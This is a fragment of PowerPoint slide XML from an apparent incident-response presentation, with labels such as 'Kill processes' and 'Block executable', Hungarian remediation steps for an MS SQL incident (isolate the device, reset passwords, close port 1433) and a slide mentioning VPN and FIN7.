                <a:ext cx="2789719" cy="707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Kill processes</a:t>
                </a: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51336BF7-7834-43CB-0D5F-4F8BFA52DC2F}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6574689" y="5858532"/>
                <a:ext cx="3416388" cy="707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Block executable</a:t>
                </a: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358CEF54-6D08-2A10-73E4-30803A14A5AC}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6574689" y="6751666"/>
                <a:ext cx="3938233" cy="707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Unblock executable</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="80" name="Graphic 79">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3039D6AB-FEDC-A47E-5835-73035A8BC3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5782139" y="2645078"/>
                <a:ext cx="523582" cy="523582"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="81" name="Graphic 80">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F7332446-68D3-4736-B705-308496F4B1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5763440" y="3501119"/>
                <a:ext cx="560981" cy="560981"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="82" name="Graphic 81">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E931EE26-152A-AA0B-5287-98E7998F55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p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="5763440" y="4716713"/>
                <a:ext cx="560981" cy="560981"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="83" name="Graphic 82">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{64D5D738-34AE-297E-87A8-EBA561E296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p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="5782139" y="5919906"/>
                <a:ext cx="523582" cy="523582"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic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E30721DE-9B45-23A8-6A43-EA3241D36B55}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr/>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="5760212" y="4420881"/>
                <a:ext cx="5616625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A6581E41-F7A2-45BB-CB8C-D60FA512F255}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr/>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="5760212" y="5547933"/>
                <a:ext cx="56166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1" name="Rounded Rectangle 70">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FB440D23-F36D-A3FA-D5E4-1B8A6C76AECC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5660289" y="7975601"/>
              <a:ext cx="5716548" cy="1168399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720000" rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-GB" sz="1800">
                  <a:solidFill>
                    <a:schemeClr val="accent1"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
                </a:rPr>
                <a:t>INCIDENT ACTIONS</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="72" name="Triangle 71">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B666910B-A677-6226-EDCE-20BBF55CA877}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="10594664" y="8465598"/>
              <a:ext cx="426260" cy="210887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720000" rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:endParaRPr lang="sk-SK" sz="3200">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="89" name="Rounded Rectangle 88">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE2A5F36-5156-406C-4A34-4BE5D597F2FA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5660289" y="2457634"/>
              <a:ext cx="5716546" cy="940360"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FF0000">
                <a:alpha val="10272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720000" rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:endParaRPr lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="43" name="Group 156">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A198153B-E046-2E0C-155E-875A4026021A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3599011" y="501026"/>
            <a:ext cx="1205793" cy="1205793"/>
            <a:chOff x="9228675" y="2933048"/>
            <a:chExt cx="4118889" cy="4118889"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="44" name="Group 157">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{50806D0E-6F5F-8BE6-01D7-1233E88D8AC1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="9228675" y="2933048"/>
              <a:ext cx="4118889" cy="4118889"/>
              <a:chOff x="7931149" y="2626295"/>
              <a:chExt cx="4118889" cy="4118889"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="46" name="Group 159">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{825C668A-81CB-463F-A357-228AE18F2A66}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="11339954" y="3278140"/>
                <a:ext cx="522194" cy="527315"/>
                <a:chOff x="3190875" y="974570"/>
                <a:chExt cx="249325" cy="251770"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="48" name="Rectangle 161">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3A683408-4A22-AF01-DB95-1771C30360D6}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3190875" y="974570"/>
                  <a:ext cx="112232" cy="1130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25"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="49" name="Rectangle 162">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DD02AB51-D9A7-9D35-1B0A-F17501941121}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3327968" y="974570"/>
                  <a:ext cx="112232" cy="1130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25"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="50" name="Rectangle 163">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E2CE5D8-F002-535C-E08B-03B0ABF9A7E0}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3190875" y="1113316"/>
                  <a:ext cx="112232" cy="1130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25"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="51" name="Rectangle 164">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{660EB8AC-5E6F-1A68-30D3-1C26B5414452}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3327968" y="1113316"/>
                  <a:ext cx="112232" cy="1130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25"/>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="47" name="Graphic 160">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{403DCE12-6EC6-5323-7A1D-B911703FFF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p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="7931149" y="2626295"/>
                <a:ext cx="4118889" cy="4118889"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="45" name="Oval 158">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3DD5AFDD-7C68-20A5-4F7B-0EB5F18A1FA3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10515933" y="4127841"/>
              <a:ext cx="1578270" cy="46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</p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="52" name="!!Agenda">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D353D653-61A0-B693-BB4F-C4CB001ADC6E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1389427" y="850886"/>
            <a:ext cx="5358657" cy="838155"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr" defTabSz="187631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923"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="1862" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1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defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="4754" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00BBC5"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>M</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="4754" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00BBC5"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="4754" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00BBC5"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> SQL</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4754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DD1C108F-5165-586C-FA31-9D61AB33FA37}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1132396" y="2553799"/>
            <a:ext cx="12415559" cy="5532837"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="135860" tIns="67930" rIns="135860" bIns="67930" numCol="1" spcCol="540000" rtlCol="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="152408" indent="-152408" algn="l" defTabSz="609630" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="12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1467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23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hu-HU" sz="5400" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="5700" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>	Érintett eszköz leválasztása a hálózatról</a:t>
            </a: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hu-HU" sz="5700" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> 	Minden MS SQL felhasználónak jelszó 	változtatás</a:t>
            </a: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hu-HU" sz="5700" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> 	1433-as port lezárása</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="304815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0827699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2A206A-B462-76D9-AE53-4E02C0163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713B5DE-0CC1-919F-5C82-F0C0E4BA85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46675" y="3766757"/>
            <a:ext cx="12017829" cy="2760443"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="9600" dirty="0" smtClean="0"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VPN </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="9600" dirty="0" smtClean="0"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-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="9600" dirty="0" smtClean="0"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9600" dirty="0"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FIN7</a:t>
            </a:r>
            <a:endParaRPr lang="en-SK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2A51CB3-7560-E217-C85D-169D56715222}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="11286881" y="3612194"/>
            <a:ext cx="4302359" cy="3643045"/>
            <a:chOff x="14355931" y="4578522"/>
            <a:chExt cx="1877003" cy="158936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EBB04A3-467F-FEC4-A0BE-9C9C9109C3B3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="14355931" y="4578522"/>
              <a:ext cx="1160569" cy="1339172"/>
              <a:chOff x="14027225" y="3493572"/>
              <a:chExt cx="1160569" cy="1339172"/>
            </a:xfrm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F8ACED8C-A1A6-6ED0-A3DA-ED1814B99435}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="14518214" y="3850697"/>
                <a:ext cx="178590" cy="178538"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="connsiteX0" fmla="*/ 178590 w 178590"/>
                  <a:gd name="connsiteY0" fmla="*/ 89243 h 178538"/>
                  <a:gd name="connsiteX1" fmla="*/ 89295 w 178590"/>
                  <a:gd name="connsiteY1" fmla="*/ 178538 h 178538"/>
                  <a:gd name="connsiteX2" fmla="*/ 0 w 178590"/>
                  <a:gd name="connsiteY2" fmla="*/ 89243 h 178538"/>
                  <a:gd name="connsiteX3" fmla="*/ 89295 w 178590"/>
                  <a:gd name="connsiteY3" fmla="*/ 0 h 178538"/>
                  <a:gd name="connsiteX4" fmla="*/ 178590 w 178590"/>
                  <a:gd name="connsiteY4" fmla="*/ 89243 h 178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590" h="178538">
                    <a:moveTo>
                      <a:pt x="178590" y="89243"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="178590" y="138572"/>
                      <a:pt x="138624" y="178538"/>
                      <a:pt x="89295" y="178538"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="39966" y="178538"/>
                      <a:pt x="0" y="138572"/>
                      <a:pt x="0" y="89243"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="39966"/>
                      <a:pt x="39966" y="0"/>
                      <a:pt x="89295" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="138624" y="0"/>
                      <a:pt x="178590" y="39966"/>
                      <a:pt x="178590" y="89243"/>
                    </a:cubicBezTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:ln w="13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SK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FFD9D120-08A0-4315-34EB-852D48DFC8C3}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="14027225" y="3493572"/>
                <a:ext cx="1160569" cy="1339172"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="connsiteX0" fmla="*/ 580284 w 1160569"/>
                  <a:gd name="connsiteY0" fmla="*/ 267885 h 1339172"/>
                  <a:gd name="connsiteX1" fmla="*/ 401748 w 1160569"/>
                  <a:gd name="connsiteY1" fmla="*/ 446422 h 1339172"/>
                  <a:gd name="connsiteX2" fmla="*/ 535664 w 1160569"/>
                  <a:gd name="connsiteY2" fmla="*/ 619147 h 1339172"/>
                  <a:gd name="connsiteX3" fmla="*/ 535664 w 1160569"/>
                  <a:gd name="connsiteY3" fmla="*/ 982032 h 1339172"/>
                  <a:gd name="connsiteX4" fmla="*/ 580284 w 1160569"/>
                  <a:gd name="connsiteY4" fmla="*/ 1026653 h 1339172"/>
                  <a:gd name="connsiteX5" fmla="*/ 714200 w 1160569"/>
                  <a:gd name="connsiteY5" fmla="*/ 1026653 h 1339172"/>
                  <a:gd name="connsiteX6" fmla="*/ 758821 w 1160569"/>
                  <a:gd name="connsiteY6" fmla="*/ 982032 h 1339172"/>
                  <a:gd name="connsiteX7" fmla="*/ 714200 w 1160569"/>
                  <a:gd name="connsiteY7" fmla="*/ 937411 h 1339172"/>
                  <a:gd name="connsiteX8" fmla="*/ 624905 w 1160569"/>
                  <a:gd name="connsiteY8" fmla="*/ 937411 h 1339172"/>
                  <a:gd name="connsiteX9" fmla="*/ 624905 w 1160569"/>
                  <a:gd name="connsiteY9" fmla="*/ 848116 h 1339172"/>
                  <a:gd name="connsiteX10" fmla="*/ 714200 w 1160569"/>
                  <a:gd name="connsiteY10" fmla="*/ 848116 h 1339172"/>
                  <a:gd name="connsiteX11" fmla="*/ 758821 w 1160569"/>
                  <a:gd name="connsiteY11" fmla="*/ 803495 h 1339172"/>
                  <a:gd name="connsiteX12" fmla="*/ 714200 w 1160569"/>
                  <a:gd name="connsiteY12" fmla="*/ 758875 h 1339172"/>
                  <a:gd name="connsiteX13" fmla="*/ 624905 w 1160569"/>
                  <a:gd name="connsiteY13" fmla="*/ 758875 h 1339172"/>
                  <a:gd name="connsiteX14" fmla="*/ 624905 w 1160569"/>
                  <a:gd name="connsiteY14" fmla="*/ 619147 h 1339172"/>
                  <a:gd name="connsiteX15" fmla="*/ 758821 w 1160569"/>
                  <a:gd name="connsiteY15" fmla="*/ 446422 h 1339172"/>
                  <a:gd name="connsiteX16" fmla="*/ 580284 w 1160569"/>
                  <a:gd name="connsiteY16" fmla="*/ 267885 h 1339172"/>
                  <a:gd name="connsiteX17" fmla="*/ 580284 w 1160569"/>
                  <a:gd name="connsiteY17" fmla="*/ 0 h 1339172"/>
                  <a:gd name="connsiteX18" fmla="*/ 892737 w 1160569"/>
                  <a:gd name="connsiteY18" fmla="*/ 89295 h 1339172"/>
                  <a:gd name="connsiteX19" fmla="*/ 1160569 w 1160569"/>
                  <a:gd name="connsiteY19" fmla="*/ 133916 h 1339172"/>
                  <a:gd name="connsiteX20" fmla="*/ 1160569 w 1160569"/>
                  <a:gd name="connsiteY20" fmla="*/ 477112 h 1339172"/>
                  <a:gd name="connsiteX21" fmla="*/ 1148262 w 1160569"/>
                  <a:gd name="connsiteY21" fmla="*/ 479597 h 1339172"/>
                  <a:gd name="connsiteX22" fmla="*/ 1044021 w 1160569"/>
                  <a:gd name="connsiteY22" fmla="*/ 636859 h 1339172"/>
                  <a:gd name="connsiteX23" fmla="*/ 1054473 w 1160569"/>
                  <a:gd name="connsiteY23" fmla="*/ 688631 h 1339172"/>
                  <a:gd name="connsiteX24" fmla="*/ 1024168 w 1160569"/>
                  <a:gd name="connsiteY24" fmla="*/ 694750 h 1339172"/>
                  <a:gd name="connsiteX25" fmla="*/ 919927 w 1160569"/>
                  <a:gd name="connsiteY25" fmla="*/ 852012 h 1339172"/>
                  <a:gd name="connsiteX26" fmla="*/ 969917 w 1160569"/>
                  <a:gd name="connsiteY26" fmla="*/ 972698 h 1339172"/>
                  <a:gd name="connsiteX27" fmla="*/ 978998 w 1160569"/>
                  <a:gd name="connsiteY27" fmla="*/ 978821 h 1339172"/>
                  <a:gd name="connsiteX28" fmla="*/ 977587 w 1160569"/>
                  <a:gd name="connsiteY28" fmla="*/ 979106 h 1339172"/>
                  <a:gd name="connsiteX29" fmla="*/ 873346 w 1160569"/>
                  <a:gd name="connsiteY29" fmla="*/ 1136368 h 1339172"/>
                  <a:gd name="connsiteX30" fmla="*/ 880413 w 1160569"/>
                  <a:gd name="connsiteY30" fmla="*/ 1171373 h 1339172"/>
                  <a:gd name="connsiteX31" fmla="*/ 811434 w 1160569"/>
                  <a:gd name="connsiteY31" fmla="*/ 1223714 h 1339172"/>
                  <a:gd name="connsiteX32" fmla="*/ 714200 w 1160569"/>
                  <a:gd name="connsiteY32" fmla="*/ 1277544 h 1339172"/>
                  <a:gd name="connsiteX33" fmla="*/ 580284 w 1160569"/>
                  <a:gd name="connsiteY33" fmla="*/ 1339172 h 1339172"/>
                  <a:gd name="connsiteX34" fmla="*/ 446368 w 1160569"/>
                  <a:gd name="connsiteY34" fmla="*/ 1277544 h 1339172"/>
                  <a:gd name="connsiteX35" fmla="*/ 0 w 1160569"/>
                  <a:gd name="connsiteY35" fmla="*/ 579401 h 1339172"/>
                  <a:gd name="connsiteX36" fmla="*/ 0 w 1160569"/>
                  <a:gd name="connsiteY36" fmla="*/ 133916 h 1339172"/>
                  <a:gd name="connsiteX37" fmla="*/ 267832 w 1160569"/>
                  <a:gd name="connsiteY37" fmla="*/ 89295 h 1339172"/>
                  <a:gd name="connsiteX38" fmla="*/ 580284 w 1160569"/>
                  <a:gd name="connsiteY38" fmla="*/ 0 h 1339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160569" h="1339172">
                    <a:moveTo>
                      <a:pt x="580284" y="267885"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="481679" y="267885"/>
                      <a:pt x="401748" y="347764"/>
                      <a:pt x="401748" y="446422"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="401748" y="529434"/>
                      <a:pt x="458453" y="599531"/>
                      <a:pt x="535664" y="619147"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="535664" y="982032"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="535664" y="1006566"/>
                      <a:pt x="555751" y="1026653"/>
                      <a:pt x="580284" y="1026653"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="714200" y="1026653"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="738734" y="1026653"/>
                      <a:pt x="758821" y="1006566"/>
                      <a:pt x="758821" y="982032"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="758821" y="957499"/>
                      <a:pt x="738734" y="937411"/>
                      <a:pt x="714200" y="937411"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="624905" y="937411"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="624905" y="848116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="714200" y="848116"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="738734" y="848116"/>
                      <a:pt x="758821" y="828029"/>
                      <a:pt x="758821" y="803495"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="758821" y="778962"/>
                      <a:pt x="738734" y="758875"/>
                      <a:pt x="714200" y="758875"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="624905" y="758875"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="624905" y="619147"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="702116" y="599542"/>
                      <a:pt x="758821" y="529439"/>
                      <a:pt x="758821" y="446422"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="758821" y="347764"/>
                      <a:pt x="678943" y="267885"/>
                      <a:pt x="580284" y="267885"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="580284" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="671776" y="32590"/>
                      <a:pt x="776241" y="63873"/>
                      <a:pt x="892737" y="89295"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="988728" y="110272"/>
                      <a:pt x="1078441" y="124552"/>
                      <a:pt x="1160569" y="133916"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="1160569" y="477112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1148262" y="479597"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="1087004" y="505507"/>
                      <a:pt x="1044021" y="566163"/>
                      <a:pt x="1044021" y="636859"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="1054473" y="688631"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1024168" y="694750"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="962910" y="720660"/>
                      <a:pt x="919927" y="781316"/>
                      <a:pt x="919927" y="852012"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="919927" y="899143"/>
                      <a:pt x="939031" y="941811"/>
                      <a:pt x="969917" y="972698"/>
                    </a:cubicBezTo>
